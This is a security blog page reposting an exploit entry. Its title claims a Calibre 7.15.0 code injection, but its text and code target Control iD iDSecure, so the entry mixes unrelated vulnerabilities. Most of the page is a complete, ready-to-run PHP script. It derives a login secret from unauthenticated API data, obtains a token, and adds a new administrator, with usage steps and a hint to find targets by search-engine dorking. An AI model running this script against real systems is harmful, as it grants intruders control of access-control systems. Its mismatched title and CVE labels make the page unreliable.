Latest Tech

Latest Posts

 

 

Calibre 7.15.0 Code Injection

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 226
Calibre 7.15.0 Code Injection
Calibre 7.15.0 Code Injection
=============================================================================================================================================
| # Title : Calibre 7.15.0 =============================================================================================================================================
| # Title : Calibre 7.15.0 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://download.calibre-ebook.com/7.15.0/ |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: It used to exploit a vulnerability in the Control iD iDSecure access control system that allows unauthenticated remote attackers to access the system administration interface and add a new administrative user.

Main uses of the code: Version check: The code first checks whether the current version of the system is affected by the specified vulnerability (CVE-2023-6329).

If the version is affected by the vulnerability (less than or equal to 4.7.43.0), the exploit can be executed.

Sensitive data extraction:Extracts data such as serial and passwordRandom from the target server using a GET request to a specific API.

This data is used to generate a custom password (passwordCustom) which is part of the authentication process.

( https://packetstorm.news/files/id/180007/ CVE-2024-6782)

[+] save code as poc.php.

[+] Set Target : line 162

[+] USage : php poc.php

[+] PayLoad :


<?php

class ControlIDiDSecureAuthBypass {
private $target_uri;
private $new_user;
private $new_password;

public function __construct($target_uri, $new_user = null, $new_password = null) {
$this->target_uri = $target_uri;
$this->new_user = $new_user ?? bin2hex(random_bytes(4)); // Default to random alphanumeric user
$this->new_password = $new_password ?? bin2hex(random_bytes(6)); // Default to random alphanumeric password
}

// Check if vulnerable version is running
public function check() {
$url = $this->target_uri . '/api/util/configUI';
$response = $this->send_request($url, 'GET');

if ($response['code'] != 401) {
return 'Unknown';
}

$data = json_decode($response['body'], true);
$version = $data['Version'] ?? null;

if (is_null($version)) {
return 'Unknown';
}

echo "Got version: $version\n";
if (version_compare($version, '4.7.43.0', '<=')) {
return 'Appears';
}

return 'Safe';
}

// Exploit to add a new user
public function run() {
// Step 1: Get serial and passwordRandom
$url = $this->target_uri . '/api/login/unlockGetData';
$response = $this->send_request($url, 'GET');

if (!$response) {
throw new Exception("Failed to receive a reply from the server.");
}

$json = json_decode($response['body'], true);
$password_random = $json['passwordRandom'] ?? null;
$serial = $json['serial'] ?? null;

if (!$password_random || !$serial) {
throw new Exception('Unable to retrieve passwordRandom and serial');
}

echo "Retrieved passwordRandom: $password_random\n";
echo "Retrieved serial: $serial\n";

// Step 2: Create passwordCustom
$sha1_hash = sha1($serial);
$combined_string = $sha1_hash . $password_random . 'cid2016';
$sha256_hash = hash('sha256', $combined_string);
$short_hash = substr($sha256_hash, 0, 6);
$password_custom = base_convert($short_hash, 16, 10);

echo "Created passwordCustom: $password_custom\n";

// Step 3: Login with passwordCustom and passwordRandom to get JWT
$body = json_encode([
'passwordCustom' => $password_custom,
'passwordRandom' => $password_random
]);

$url = $this->target_uri . '/api/login/';
$response = $this->send_request($url, 'POST', $body);

if (!$response) {
throw new Exception("Failed to receive a reply from the server.");
}

$json = json_decode($response['body'], true);
$access_token = $json['accessToken'] ?? null;

if (!$access_token) {
throw new Exception('Did not receive JWT');
}

echo "Retrieved JWT: $access_token\n";

// Step 4: Add a new administrative user
$body = json_encode([
'idType' => '1',
'name' => $this->new_user,
'user' => $this->new_user,
'newPassword' => $this->new_password,
'password_confirmation' => $this->new_password
]);

$url = $this->target_uri . '/api/operator/';
$response = $this->send_request($url, 'POST', $body, $access_token);

if (!$response) {
throw new Exception("Failed to receive a reply from the server.");
}

$json = json_decode($response['body'], true);
if ($json['code'] !== 200 || $json['error'] !== 'OK') {
throw new Exception('Unexpected reply from server');
}

// Step 5: Confirm the new credentials work
$body = json_encode([
'username' => $this->new_user,
'password' => $this->new_password,
'passwordCustom' => null
]);

$url = $this->target_uri . '/api/login/';
$response = $this->send_request($url, 'POST', $body);

if (!$response) {
throw new Exception("Failed to receive a reply from the server.");
}

$json = json_decode($response['body'], true);
if (!isset($json['accessToken']) || !isset($json['unlock'])) {
throw new Exception('Received unexpected reply');
}

echo "New user '{$this->new_user}:{$this->new_password}' was successfully added.\n";
echo "Login at: " . $this->target_uri . "/#/login\n";
}

// Helper function to send HTTP requests
private function send_request($url, $method, $body = null, $token = null) {
$headers = [
'Content-Type: application/json'
];

if ($token) {
$headers[] = "Authorization: Bearer $token";
}

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
if ($body) {
curl_setopt($ch, CURLOPT_POSTFIELDS, $body);
}
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

$response_body = curl_exec($ch);
$response_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

curl_close($ch);

return ['code' => $response_code, 'body' => $response_body];
}
}

// Example usage:
$target_uri = 'https://example.com';
$module = new ControlIDiDSecureAuthBypass($target_uri);
if ($module->check() === 'Appears') {
$module->run();
}

?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

Information Security

Social Media Share
About Contact Terms of Use Privacy Policy
© 2025 Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.